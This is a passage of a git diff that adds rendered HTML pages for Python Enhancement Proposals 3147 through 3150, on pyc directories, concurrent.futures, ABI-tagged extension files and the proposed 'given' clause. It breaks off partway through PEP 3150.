There is some overlap between the goals of this PEP and PEP 304, +which has been withdrawn. However PEP 304 would allow a user to +create a shadow file system hierarchy in which to store pyc files. +This concept of a shadow hierarchy for pyc files could be used to +satisfy the aims of this PEP. Although the PEP 304 does not indicate +why it was withdrawn, shadow directories have a number of problems. +The location of the shadow pyc files would not be easily discovered +and would depend on the proper and consistent use of the +$PYTHONBYTECODE environment variable both by the system and by end +users. There are also global implications, meaning that while the +system might want to shadow pyc files, users might not want to, but +the PEP defines only an all-or-nothing approach.

+

As an example of the problem, a common (though fragile) Python idiom +for locating data files is to do something like this:

+
from os import dirname, join
+import foo.bar
+data_file = join(dirname(foo.bar.__file__), 'my.dat')
+
+
+

This would be problematic since foo.bar.__file__ will give the +location of the pyc file in the shadow directory, and it may not be +possible to find the my.dat file relative to the source directory +from there.

+
+
+

Fat byte compilation files

+

An earlier version of this PEP described “fat” Python byte code files. +These files would contain the equivalent of multiple pyc files in a +single pyf file, with a lookup table keyed off the appropriate magic +number. This was an extensible file format so that the first 5 +parallel Python implementations could be supported fairly efficiently, +but with extension lookup tables available to scale pyf byte code +objects as large as necessary.

+

The fat byte compilation files were fairly complex, and inherently +introduced difficult race conditions, so the current simplification of +using directories was suggested. The same problem applies to using +zip files as the fat pyc file format.

+
+
+

Multiple file extensions

+

The PEP author also considered an approach where multiple thin byte +compiled files lived in the same place, but used different file +extensions to designate the Python version. E.g. foo.pyc25, +foo.pyc26, foo.pyc31 etc. This was rejected because of the clutter +involved in writing so many different files. The multiple extension +approach makes it more difficult (and an ongoing task) to update any +tools that are dependent on the file extension.

+
+
+

.pyc

+

A proposal was floated to call the __pycache__ directory .pyc or +some other dot-file name. This would have the effect on *nix systems +of hiding the directory. There are many reasons why this was +rejected by the BDFL [20] including the fact that dot-files are only +special on some platforms, and we actually do not want to hide these +completely from users.

+
+
+
+

Reference implementation

+

Work on this code is tracked in a Bazaar branch on Launchpad [22] +until it’s ready for merge into Python 3.2. The work-in-progress diff +can also be viewed [23] and is updated automatically as new changes +are uploaded.

+

A Rietveld code review issue [24] has been opened as of 2010-04-01 (no, +this is not an April Fools joke :).

+
+
+

References

+ +

[21] importlib: https://docs.python.org/3.1/library/importlib.html

+ +
+
+

ACKNOWLEDGMENTS

+

Barry Warsaw’s original idea was for fat Python byte code files. +Martin von Loewis reviewed an early draft of the PEP and suggested the +simplification to store traditional pyc and pyo files in a +directory. Many other people reviewed early versions of this PEP and +provided useful feedback including but not limited to:

+
    +
  • David Malcolm
  • +
  • Josselin Mouette
  • +
  • Matthias Klose
  • +
  • Michael Hudson
  • +
  • Michael Vogt
  • +
  • Piotr Ożarowski
  • +
  • Scott Kitterman
  • +
  • Toshio Kuratomi
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3147.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3148/index.html b/pep-3148/index.html new file mode 100644 index 00000000000..67a97644511 --- /dev/null +++ b/pep-3148/index.html @@ -0,0 +1,594 @@ + + + + + + + + PEP 3148 – futures - execute computations asynchronously | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3148 – futures - execute computations asynchronously

+
+
Author:
+
Brian Quinlan <brian at sweetapp.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Oct-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a design for a package that facilitates the +evaluation of callables using threads and processes.

+
+
+

Motivation

+

Python currently has powerful primitives to construct multi-threaded +and multi-process applications but parallelizing simple operations +requires a lot of work i.e. explicitly launching processes/threads, +constructing a work/results queue, and waiting for completion or some +other termination condition (e.g. failure, timeout). It is also +difficult to design an application with a global process/thread limit +when each component invents its own parallel execution strategy.

+
+
+

Specification

+
+

Naming

+

The proposed package would be called “futures” and would live in a new +“concurrent” top-level package. The rationale behind pushing the +futures library into a “concurrent” namespace has multiple components. +The first, most simple one is to prevent any and all confusion with +the existing “from __future__ import x” idiom which has been in use +for a long time within Python. Additionally, it is felt that adding +the “concurrent” precursor to the name fully denotes what the library +is related to - namely concurrency - this should clear up any addition +ambiguity as it has been noted that not everyone in the community is +familiar with Java Futures, or the Futures term except as it relates +to the US stock market.

+

Finally; we are carving out a new namespace for the standard library - +obviously named “concurrent”. We hope to either add, or move existing, +concurrency-related libraries to this in the future. A prime example +is the multiprocessing.Pool work, as well as other “addons” included +in that module, which work across thread and process boundaries.

+
+
+

Interface

+

The proposed package provides two core classes: Executor and +Future. An Executor receives asynchronous work requests (in terms +of a callable and its arguments) and returns a Future to represent +the execution of that work request.

+
+

Executor

+

Executor is an abstract class that provides methods to execute calls +asynchronously.

+

submit(fn, *args, **kwargs)

+
+
Schedules the callable to be executed as fn(*args, **kwargs) +and returns a Future instance representing the execution of the +callable.

This is an abstract method and must be implemented by Executor +subclasses.

+
+

map(func, *iterables, timeout=None)

+
+
Equivalent to map(func, *iterables) but func is executed +asynchronously and several calls to func may be made concurrently. +The returned iterator raises a TimeoutError if __next__() is +called and the result isn’t available after timeout seconds from +the original call to map(). If timeout is not specified or +None then there is no limit to the wait time. If a call raises +an exception then that exception will be raised when its value is +retrieved from the iterator.
+

shutdown(wait=True)

+
+
Signal the executor that it should free any resources that it is +using when the currently pending futures are done executing. +Calls to Executor.submit and Executor.map and made after +shutdown will raise RuntimeError.

If wait is True then this method will not return until all the +pending futures are done executing and the resources associated +with the executor have been freed. If wait is False then this +method will return immediately and the resources associated with +the executor will be freed when all pending futures are done +executing. Regardless of the value of wait, the entire Python +program will not exit until all pending futures are done +executing.

+
+
+
__enter__()
+
__exit__(exc_type, exc_val, exc_tb)
+
+
+
When using an executor as a context manager, __exit__ will call +Executor.shutdown(wait=True).
+
+
+

ProcessPoolExecutor

+

The ProcessPoolExecutor class is an Executor subclass that uses a +pool of processes to execute calls asynchronously. The callable +objects and arguments passed to ProcessPoolExecutor.submit must be +pickleable according to the same limitations as the multiprocessing +module.

+

Calling Executor or Future methods from within a callable +submitted to a ProcessPoolExecutor will result in deadlock.

+

__init__(max_workers)

+
+
Executes calls asynchronously using a pool of a most max_workers +processes. If max_workers is None or not given then as many +worker processes will be created as the machine has processors.
+
+
+

ThreadPoolExecutor

+

The ThreadPoolExecutor class is an Executor subclass that uses a +pool of threads to execute calls asynchronously.

+

Deadlock can occur when the callable associated with a Future waits +on the results of another Future. For example:

+
import time
+def wait_on_b():
+    time.sleep(5)
+    print(b.result())  # b will never complete because it is waiting on a.
+    return 5
+
+def wait_on_a():
+    time.sleep(5)
+    print(a.result())  # a will never complete because it is waiting on b.
+    return 6
+
+
+executor = ThreadPoolExecutor(max_workers=2)
+a = executor.submit(wait_on_b)
+b = executor.submit(wait_on_a)
+
+
+

And:

+
def wait_on_future():
+    f = executor.submit(pow, 5, 2)
+    # This will never complete because there is only one worker thread and
+    # it is executing this function.
+    print(f.result())
+
+executor = ThreadPoolExecutor(max_workers=1)
+executor.submit(wait_on_future)
+
+
+

__init__(max_workers)

+
+
Executes calls asynchronously using a pool of at most +max_workers threads.
+
+
+

Future Objects

+

The Future class encapsulates the asynchronous execution of a +callable. Future instances are returned by Executor.submit.

+

cancel()

+
+
Attempt to cancel the call. If the call is currently being +executed then it cannot be cancelled and the method will return +False, otherwise the call will be cancelled and the method will +return True.
+

cancelled()

+
+
Return True if the call was successfully cancelled.
+

running()

+
+
Return True if the call is currently being executed and cannot +be cancelled.
+

done()

+
+
Return True if the call was successfully cancelled or finished +running.
+

result(timeout=None)

+
+
Return the value returned by the call. If the call hasn’t yet +completed then this method will wait up to timeout seconds. If +the call hasn’t completed in timeout seconds then a +TimeoutError will be raised. If timeout is not specified or +None then there is no limit to the wait time.

If the future is cancelled before completing then CancelledError +will be raised.

+

If the call raised then this method will raise the same exception.

+
+

exception(timeout=None)

+
+
Return the exception raised by the call. If the call hasn’t yet +completed then this method will wait up to timeout seconds. If +the call hasn’t completed in timeout seconds then a +TimeoutError will be raised. If timeout is not specified or +None then there is no limit to the wait time.

If the future is cancelled before completing then CancelledError +will be raised.

+

If the call completed without raising then None is returned.

+
+

add_done_callback(fn)

+
+
Attaches a callable fn to the future that will be called when +the future is cancelled or finishes running. fn will be called +with the future as its only argument.

Added callables are called in the order that they were added and +are always called in a thread belonging to the process that added +them. If the callable raises an Exception then it will be +logged and ignored. If the callable raises another +BaseException then behavior is not defined.

+

If the future has already completed or been cancelled then fn +will be called immediately.

+
+
+
Internal Future Methods
+

The following Future methods are meant for use in unit tests and +Executor implementations.

+

set_running_or_notify_cancel()

+
+
Should be called by Executor implementations before executing +the work associated with the Future.

If the method returns False then the Future was cancelled, +i.e. Future.cancel was called and returned True. Any threads +waiting on the Future completing (i.e. through as_completed() +or wait()) will be woken up.

+

If the method returns True then the Future was not cancelled +and has been put in the running state, i.e. calls to +Future.running() will return True.

+

This method can only be called once and cannot be called after +Future.set_result() or Future.set_exception() have been +called.

+
+

set_result(result)

+
+
Sets the result of the work associated with the Future.
+

set_exception(exception)

+
+
Sets the result of the work associated with the Future to the +given Exception.
+
+
+
+

Module Functions

+

wait(fs, timeout=None, return_when=ALL_COMPLETED)

+
+
Wait for the Future instances (possibly created by different +Executor instances) given by fs to complete. Returns a named +2-tuple of sets. The first set, named “done”, contains the +futures that completed (finished or were cancelled) before the +wait completed. The second set, named “not_done”, contains +uncompleted futures.

timeout can be used to control the maximum number of seconds to +wait before returning. If timeout is not specified or None then +there is no limit to the wait time.

+

return_when indicates when the method should return. It must be +one of the following constants:

+ + + + + + + + + + + + + + + + + +
ConstantDescription
FIRST_COMPLETEDThe method will return when any future finishes or +is cancelled.
FIRST_EXCEPTIONThe method will return when any future finishes by +raising an exception. If not future raises an +exception then it is equivalent to ALL_COMPLETED.
ALL_COMPLETEDThe method will return when all calls finish.
+
+

as_completed(fs, timeout=None)

+
+
Returns an iterator over the Future instances given by fs that +yields futures as they complete (finished or were cancelled). Any +futures that completed before as_completed() was called will be +yielded first. The returned iterator raises a TimeoutError if +__next__() is called and the result isn’t available after +timeout seconds from the original call to as_completed(). If +timeout is not specified or None then there is no limit to the +wait time.

The Future instances can have been created by different +Executor instances.

+
+
+
+
+

Check Prime Example

+
from concurrent import futures
+import math
+
+PRIMES = [
+    112272535095293,
+    112582705942171,
+    112272535095293,
+    115280095190773,
+    115797848077099,
+    1099726899285419]
+
+def is_prime(n):
+    if n % 2 == 0:
+        return False
+
+    sqrt_n = int(math.floor(math.sqrt(n)))
+    for i in range(3, sqrt_n + 1, 2):
+        if n % i == 0:
+            return False
+    return True
+
+def main():
+    with futures.ProcessPoolExecutor() as executor:
+        for number, prime in zip(PRIMES, executor.map(is_prime,
+                                                      PRIMES)):
+            print('%d is prime: %s' % (number, prime))
+
+if __name__ == '__main__':
+    main()
+
+
+
+
+

Web Crawl Example

+
from concurrent import futures
+import urllib.request
+
+URLS = ['http://www.foxnews.com/',
+        'http://www.cnn.com/',
+        'http://europe.wsj.com/',
+        'http://www.bbc.co.uk/',
+        'http://some-made-up-domain.com/']
+
+def load_url(url, timeout):
+    return urllib.request.urlopen(url, timeout=timeout).read()
+
+def main():
+    with futures.ThreadPoolExecutor(max_workers=5) as executor:
+        future_to_url = dict(
+            (executor.submit(load_url, url, 60), url)
+             for url in URLS)
+
+        for future in futures.as_completed(future_to_url):
+            url = future_to_url[future]
+            try:
+                print('%r page is %d bytes' % (
+                          url, len(future.result())))
+            except Exception as e:
+                print('%r generated an exception: %s' % (
+                          url, e))
+
+if __name__ == '__main__':
+    main()
+
+
+
+
+
+

Rationale

+

The proposed design of this module was heavily influenced by the +Java java.util.concurrent package [1]. The conceptual basis of the +module, as in Java, is the Future class, which represents the progress +and result of an asynchronous computation. The Future class makes +little commitment to the evaluation mode being used e.g. it can be +used to represent lazy or eager evaluation, for evaluation using +threads, processes or remote procedure call.

+

Futures are created by concrete implementations of the Executor class +(called ExecutorService in Java). The reference implementation +provides classes that use either a process or a thread pool to eagerly +evaluate computations.

+

Futures have already been seen in Python as part of a popular Python +cookbook recipe [2] and have discussed on the Python-3000 mailing +list [3].

+

The proposed design is explicit, i.e. it requires that clients be +aware that they are consuming Futures. It would be possible to design +a module that would return proxy objects (in the style of weakref) +that could be used transparently. It is possible to build a proxy +implementation on top of the proposed explicit mechanism.

+

The proposed design does not introduce any changes to Python language +syntax or semantics. Special syntax could be introduced [4] to mark +function and method calls as asynchronous. A proxy result would be +returned while the operation is eagerly evaluated asynchronously, and +execution would only block if the proxy object were used before the +operation completed.

+

Anh Hai Trinh proposed a simpler but more limited API concept [5] and +the API has been discussed in some detail on stdlib-sig [6].

+

The proposed design was discussed on the Python-Dev mailing list [7]. +Following those discussions, the following changes were made:

+
    +
  • The Executor class was made into an abstract base class
  • +
  • The Future.remove_done_callback method was removed due to a lack +of convincing use cases
  • +
  • The Future.add_done_callback method was modified to allow the +same callable to be added many times
  • +
  • The Future class’s mutation methods were better documented to +indicate that they are private to the Executor that created them
  • +
+
+
+

Reference Implementation

+

The reference implementation [8] contains a complete implementation +of the proposed design. It has been tested on Linux and Mac OS X.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3148.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3149/index.html b/pep-3149/index.html new file mode 100644 index 00000000000..42cd07a7664 --- /dev/null +++ b/pep-3149/index.html @@ -0,0 +1,426 @@ + + + + + + + + PEP 3149 – ABI version tagged .so files | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3149 – ABI version tagged .so files

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Jul-2010
+
Python-Version:
+
3.2
+
Post-History:
+
14-Jul-2010, 22-Jul-2010
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3147 described an extension to Python’s import machinery that +improved the sharing of Python source code, by allowing more than one +byte compilation file (.pyc) to be co-located with each source file.

+

This PEP defines an adjunct feature which allows the co-location of +extension module files (.so) in a similar manner. This optional, +build-time feature will enable downstream distributions of Python to +more easily provide more than one Python major version at a time.

+
+
+

Background

+

PEP 3147 defined the file system layout for a pure-Python package, +where multiple versions of Python are available on the system. For +example, where the alpha package containing source modules one.py +and two.py exist on a system with Python 3.2 and 3.3, the post-byte +compilation file system layout would be:

+
alpha/
+    __pycache__/
+        __init__.cpython-32.pyc
+        __init__.cpython-33.pyc
+        one.cpython-32.pyc
+        one.cpython-33.pyc
+        two.cpython-32.pyc
+        two.cpython-33.pyc
+    __init__.py
+    one.py
+    two.py
+
+
+

For packages with extension modules, a similar differentiation is +needed for the module’s .so files. Extension modules compiled for +different Python major versions are incompatible with each other due +to changes in the ABI. Different configuration/compilation options +for the same Python version can result in different ABIs +(e.g. –with-wide-unicode).

+

While PEP 384 defines a stable ABI, it will minimize, but not +eliminate extension module incompatibilities between Python builds or +major versions. Thus a mechanism for discriminating extension module +file names is proposed.

+
+
+

Rationale

+

Linux distributions such as Ubuntu [3] and Debian [4] provide more +than one Python version at the same time to their users. For example, +Ubuntu 9.10 Karmic Koala users can install Python 2.5, 2.6, and 3.1, +with Python 2.6 being the default.

+

In order to share as much as possible between the available Python +versions, these distributions install third party package modules +(.pyc and .so files) into /usr/share/pyshared and symlink to +them from /usr/lib/pythonX.Y/dist-packages. The symlinks exist +because in a pre-PEP 3147 world (i.e < Python 3.2), the .pyc files +resulting from byte compilation by the various installed Pythons will +name collide with each other. For Python versions >= 3.2, all +pure-Python packages can be shared, because the .pyc files will no +longer cause file system naming conflicts. Eliminating these symlinks +makes for a simpler, more robust Python distribution.

+

A similar situation arises with shared library extensions. Because +extension modules are typically named foo.so for a foo extension +module, these would also name collide if foo was provided for more +than one Python version.

+

In addition, because different configuration/compilation options for +the same Python version can cause different ABIs to be presented to +extension modules. On POSIX systems for example, the configure +options --with-pydebug, --with-pymalloc, and +--with-wide-unicode all change the ABI. This PEP proposes to +encode build-time options in the file name of the .so extension +module files.

+

PyPy [5] can also benefit from this PEP, allowing it to avoid name +collisions in extension modules built for its API, but with a +different .so tag.

+
+
+

Proposal

+

The configure/compilation options chosen at Python interpreter +build-time will be encoded in the shared library file name for +extension modules. This “tag” will appear between the module base +name and the operation file system extension for shared libraries.

+

The following information MUST be included in the shared library +file name:

+
    +
  • The Python implementation (e.g. cpython, pypy, jython, etc.)
  • +
  • The interpreter’s major and minor version numbers
  • +
+

These two fields are separated by a hyphen and no dots are to appear +between the major and minor version numbers. E.g. cpython-32.

+

Python implementations MAY include additional flags in the file name +tag as appropriate. For example, on POSIX systems these flags will +also contribute to the file name:

+
    +
  • --with-pydebug (flag: d)
  • +
  • --with-pymalloc (flag: m)
  • +
  • --with-wide-unicode (flag: u)
  • +
+

By default in Python 3.2, configure enables --with-pymalloc so +shared library file names would appear as foo.cpython-32m.so. +When the other two flags are also enabled, the file names would be +foo.cpython-32dmu.so.

+

The shared library file name tag is used unconditionally; it cannot be +changed. The tag and extension module suffix are available through +the sysconfig modules via the following variables:

+
>>> sysconfig.get_config_var('EXT_SUFFIX')
+'.cpython-32mu.so'
+>>> sysconfig.get_config_var('SOABI')
+'cpython-32mu'
+
+
+

Note that $SOABI contains just the tag, while $EXT_SUFFIX includes the +platform extension for shared library files, and is the exact suffix +added to the extension module name.

+

For an arbitrary package foo, you might see these files when the +distribution package was installed:

+
/usr/lib/python/foo.cpython-32m.so
+/usr/lib/python/foo.cpython-33m.so
+
+
+

(These paths are for example purposes only. Distributions are free to +use whatever filesystem layout they choose, and nothing in this PEP +changes the locations where from-source builds of Python are +installed.)

+

Python’s dynamic module loader will recognize and import shared +library extension modules with a tag that matches its build-time +options. For backward compatibility, Python will also continue to +import untagged extension modules, e.g. foo.so.

+

This shared library tag would be used globally for all distutils-based +extension modules, regardless of where on the file system they are +built. Extension modules built by means other than distutils would +either have to calculate the tag manually, or fallback to the +non-tagged .so file name.

+
+
+

Proven approach

+

The approach described here is already proven, in a sense, on Debian +and Ubuntu system where different extensions are used for debug builds +of Python and extension modules. Debug builds on Windows also already +use a different file extension for dynamic libraries, and in fact +encoded (in a different way than proposed in this PEP) the Python +major and minor version in the .dll file name.

+
+
+

Windows

+

This PEP only addresses build issues on POSIX systems that use the +configure script. While Windows or other platform support is not +explicitly disallowed under this PEP, platform expertise is needed in +order to evaluate, describe, and implement support on such platforms. +It is not currently clear that the facilities in this PEP are even +useful for Windows.

+
+
+

PEP 384

+

PEP 384 defines a stable ABI for extension modules. In theory, +universal adoption of PEP 384 would eliminate the need for this PEP +because all extension modules could be compatible with any Python +version. In practice of course, it will be impossible to achieve +universal adoption, and as described above, different build-time flags +still affect the ABI. Thus even with a stable ABI, this PEP may still +be necessary. While a complete specification is reserved for PEP 384, +here is a discussion of the relevant issues.

+

PEP 384 describes a change to PyModule_Create() where 3 is +passed as the API version if the extension was compiled with +Py_LIMITED_API. This should be formalized into an official macro +called PYTHON_ABI_VERSION to mirror PYTHON_API_VERSION. If +and when the ABI changes in an incompatible way, this version number +would be bumped. To facilitate sharing, Python would be extended to +search for extension modules with the PYTHON_ABI_VERSION number in +its name. The prefix abi is reserved for Python’s use.

+

Thus, an initial implementation of PEP 384, when Python is configured +with the default set of flags, would search for the following file +names when extension module foo is imported (in this order):

+
foo.cpython-XYm.so
+foo.abi3.so
+foo.so
+
+
+

The distutils [6] build_ext command would also have to be +extended to compile to shared library files with the abi3 tag, +when the module author indicates that their extension supports that +version of the ABI. This could be done in a backward compatible way +by adding a keyword argument to the Extension class, such as:

+
Extension('foo', ['foo.c'], abi=3)
+
+
+

Martin v. Löwis describes his thoughts [7] about the applicability of this +PEP to PEP 384. In summary:

+
    +
  • --with-pydebug would not be supported by the stable ABI because +this changes the layout of PyObject, which is an exposed +structure.
  • +
  • --with-pymalloc has no bearing on the issue.
  • +
  • --with-wide-unicode is trickier, though Martin’s inclination is +to force the stable ABI to use a Py_UNICODE that matches the +platform’s wchar_t.
  • +
+
+
+

Alternatives

+

In the initial python-dev thread [8] where this idea was first +introduced, several alternatives were suggested. For completeness +they are listed here, along with the reasons for not adopting them.

+ +
+

Don’t share packages with extension modules

+

It has been suggested that Python packages with extension modules not +be shared among all supported Python versions on a distribution. Even +with adoption of PEP 3149, extension modules will have to be compiled +for every supported Python version, so perhaps sharing of such +packages isn’t useful anyway. Not sharing packages with extensions +though is infeasible for several reasons.

+

If a pure-Python package is shared in one version, should it suddenly +be not-shared if the next release adds an extension module for speed? +Also, even though all extension shared libraries will be compiled and +distributed once for every supported Python, there’s a big difference +between duplicating the .so files and duplicating all .py files. +The extra size increases the download time for such packages, and more +immediately, increases the space pressures on already constrained +distribution CD-ROMs.

+
+
+
+

Reference implementation

+

Work on this code is tracked in a Bazaar branch on Launchpad [9] +until it’s ready for merge into Python 3.2. The work-in-progress diff +can also be viewed [10] and is updated automatically as new changes +are uploaded.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3149.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3150/index.html b/pep-3150/index.html new file mode 100644 index 00000000000..ca8ed65cf4e --- /dev/null +++ b/pep-3150/index.html @@ -0,0 +1,882 @@ + + + + + + + + PEP 3150 – Statement local namespaces (aka “given” clause) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3150 – Statement local namespaces (aka “given” clause)

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
09-Jul-2010
+
Python-Version:
+
3.4
+
Post-History:
+
14-Jul-2010, 21-Apr-2011, 13-Jun-2011
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of an optional given clause to several +Python statements that do not currently have an associated code suite. This +clause will create a statement local namespace for additional names that are +accessible in the associated statement, but do not become part of the +containing namespace.

+

Adoption of a new symbol, ?, is proposed to denote a forward reference +to the namespace created by running the associated code suite. It will be +a reference to a types.SimpleNamespace object.

+

The primary motivation is to enable a more declarative style of programming, +where the operation to be performed is presented to the reader first, and the +details of the necessary subcalculations are presented in the following +indented suite. As a key example, this would elevate ordinary assignment +statements to be on par with class and def statements where the name +of the item to be defined is presented to the reader in advance of the +details of how the value of that item is calculated. It also allows named +functions to be used in a “multi-line lambda” fashion, where the name is used +solely as a placeholder in the current expression and then defined in the +following suite.

+

A secondary motivation is to simplify interim calculations in module and +class level code without polluting the resulting namespaces.

+

The intent is that the relationship between a given clause and a separate +function definition that performs the specified operation will be similar to +the existing relationship between an explicit while loop and a generator that +produces the same sequence of operations as that while loop.

+

The specific proposal in this PEP has been informed by various explorations +of this and related concepts over the years (e.g. [1], [2], [3], [6], +[8]), and is inspired to some degree by the where and let clauses in +Haskell. It avoids some problems that have been identified in past proposals, +but has not yet itself been subject to the test of implementation.

+
+
+

Proposal

+

This PEP proposes the addition of an optional given clause to the +syntax for simple statements which may contain an expression, or may +substitute for such a statement for purely syntactic purposes. The +current list of simple statements that would be affected by this +addition is as follows:

+
    +
  • expression statement
  • +
  • assignment statement
  • +
  • augmented assignment statement
  • +
  • del statement
  • +
  • return statement
  • +
  • yield statement
  • +
  • raise statement
  • +
  • assert statement
  • +
  • pass statement
  • +
+

The given clause would allow subexpressions to be referenced by +name in the header line, with the actual definitions following in +the indented clause. As a simple example:

+
sorted_data = sorted(data, key=?.sort_key) given:
+    def sort_key(item):
+        return item.attr1, item.attr2
+
+
+

The new symbol ? is used to refer to the given namespace. It would be a +types.SimpleNamespace instance, so ?.sort_key functions as +a forward reference to a name defined in the given clause.

+

A docstring would be permitted in the given clause, and would be attached +to the result namespace as its __doc__ attribute.

+

The pass statement is included to provide a consistent way to skip +inclusion of a meaningful expression in the header line. While this is not +an intended use case, it isn’t one that can be prevented as multiple +alternatives (such as ... and ()) remain available even if pass +itself is disallowed.

+

The body of the given clause will execute in a new scope, using normal +function closure semantics. To support early binding of loop variables +and global references, as well as to allow access to other names defined at +class scope, the given clause will also allow explicit +binding operations in the header line:

+
# Explicit early binding via given clause
+seq = []
+for i in range(10):
+    seq.append(?.f) given i=i in:
+        def f():
+            return i
+assert [f() for f in seq] == list(range(10))
+
+
+
+

Semantics

+

The following statement:

+
op(?.f, ?.g) given bound_a=a, bound_b=b in:
+    def f():
+        return bound_a + bound_b
+    def g():
+        return bound_a - bound_b
+
+
+

Would be roughly equivalent to the following code (__var denotes a +hidden compiler variable or simply an entry on the interpreter stack):

+
__arg1 = a
+__arg2 = b
+def __scope(bound_a, bound_b):
+    def f():
+        return bound_a + bound_b
+    def g():
+        return bound_a - bound_b
+   return types.SimpleNamespace(**locals())
+__ref = __scope(__arg1, __arg2)
+__ref.__doc__ = __scope.__doc__
+op(__ref.f, __ref.g)
+
+
+

A given clause is essentially a nested function which is created and +then immediately executed. Unless explicitly passed in, names are looked +up using normal scoping rules, and thus names defined at class scope will +not be visible. Names declared as forward references are returned and +used in the header statement, without being bound locally in the +surrounding namespace.

+
+
+

Syntax Change

+

Current:

+
expr_stmt: testlist_star_expr (augassign (yield_expr|testlist) |
+             ('=' (yield_expr|testlist_star_expr))*)
+del_stmt: 'del' exprlist
+pass_stmt: 'pass'
+return_stmt: 'return' [testlist]
+yield_stmt: yield_expr
+raise_stmt: 'raise' [test ['from' test]]
+assert_stmt: 'assert' test [',' test]
+
+
+

New:

+
expr_stmt: testlist_star_expr (augassign (yield_expr|testlist) |
+             ('=' (yield_expr|testlist_star_expr))*) [given_clause]
+del_stmt: 'del' exprlist [given_clause]
+pass_stmt: 'pass' [given_clause]
+return_stmt: 'return' [testlist] [given_clause]
+yield_stmt: yield_expr [given_clause]
+raise_stmt: 'raise' [test ['from' test]] [given_clause]
+assert_stmt: 'assert' test [',' test] [given_clause]
+given_clause: "given" [(NAME '=' test)+ "in"]":" suite
+
+
+

(Note that expr_stmt in the grammar is a slight misnomer, as it covers +assignment and augmented assignment in addition to simple expression +statements)

+
+

Note

+

These proposed grammar changes don’t yet cover the forward reference +expression syntax for accessing names defined in the statement local +namespace.

+
+

The new clause is added as an optional element of the existing statements +rather than as a new kind of compound statement in order to avoid creating +an ambiguity in the grammar. It is applied only to the specific elements +listed so that nonsense like the following is disallowed:

+
break given:
+    a = b = 1
+
+import sys given:
+    a = b = 1
+
+
+

However, the precise Grammar change described above is inadequate, as it +creates problems for the definition of simple_stmt (which allows chaining of +multiple single line statements with “;” rather than “\n”).

+

So the above syntax change should instead be taken as a statement of intent. +Any actual proposal would need to resolve the simple_stmt parsing problem +before it could be seriously considered. This would likely require a +non-trivial restructuring of the grammar, breaking up small_stmt and +flow_stmt to separate the statements that potentially contain arbitrary +subexpressions and then allowing a single one of those statements with +a given clause at the simple_stmt level. Something along the lines of:

+
stmt: simple_stmt | given_stmt | compound_stmt
+simple_stmt: small_stmt (';' (small_stmt | subexpr_stmt))* [';'] NEWLINE
+small_stmt: (pass_stmt | flow_stmt | import_stmt |
+             global_stmt | nonlocal_stmt)
+flow_stmt: break_stmt | continue_stmt
+given_stmt: subexpr_stmt (given_clause |
+              (';' (small_stmt | subexpr_stmt))* [';']) NEWLINE
+subexpr_stmt: expr_stmt | del_stmt | flow_subexpr_stmt | assert_stmt
+flow_subexpr_stmt: return_stmt | raise_stmt | yield_stmt
+given_clause: "given" (NAME '=' test)* ":" suite
+
+
+

For reference, here are the current definitions at that level:

+
stmt: simple_stmt | compound_stmt
+simple_stmt: small_stmt (';' small_stmt)* [';'] NEWLINE
+small_stmt: (expr_stmt | del_stmt | pass_stmt | flow_stmt |
+             import_stmt | global_stmt | nonlocal_stmt | assert_stmt)
+flow_stmt: break_stmt | continue_stmt | return_stmt | raise_stmt | yield_stmt
+
+
+

In addition to the above changes, the definition of atom would be changed +to also allow ?. The restriction of this usage to statements with +an associated given clause would be handled by a later stage of the +compilation process (likely AST construction, which already enforces +other restrictions where the grammar is overly permissive in order to +simplify the initial parsing step).

+
+
+

New PEP 8 Guidelines

+

As discussed on python-ideas ([7], [9]) new PEP 8 guidelines would also +need to be developed to provide appropriate direction on when to use the +given clause over ordinary variable assignments.

+

Based on the similar guidelines already present for try statements, this +PEP proposes the following additions for given statements to the +“Programming Conventions” section of PEP 8:

+
    +
  • for code that could reasonably be factored out into a separate function, +but is not currently reused anywhere, consider using a given clause. +This clearly indicates which variables are being used only to define +subcomponents of another statement rather than to hold algorithm or +application state. This is an especially useful technique when +passing multi-line functions to operations which take callable +arguments.
  • +
  • keep given clauses concise. If they become unwieldy, either break +them up into multiple steps or else move the details into a separate +function.
  • +
+
+
+
+

Rationale

+

Function and class statements in Python have a unique property +relative to ordinary assignment statements: to some degree, they are +declarative. They present the reader of the code with some critical +information about a name that is about to be defined, before +proceeding on with the details of the actual definition in the +function or class body.

+

The name of the object being declared is the first thing stated +after the keyword. Other important information is also given the +honour of preceding the implementation details:

+
    +
  • decorators (which can greatly affect the behaviour of the created +object, and were placed ahead of even the keyword and name as a matter +of practicality more so than aesthetics)
  • +
  • the docstring (on the first line immediately following the header line)
  • +
  • parameters, default values and annotations for function definitions
  • +
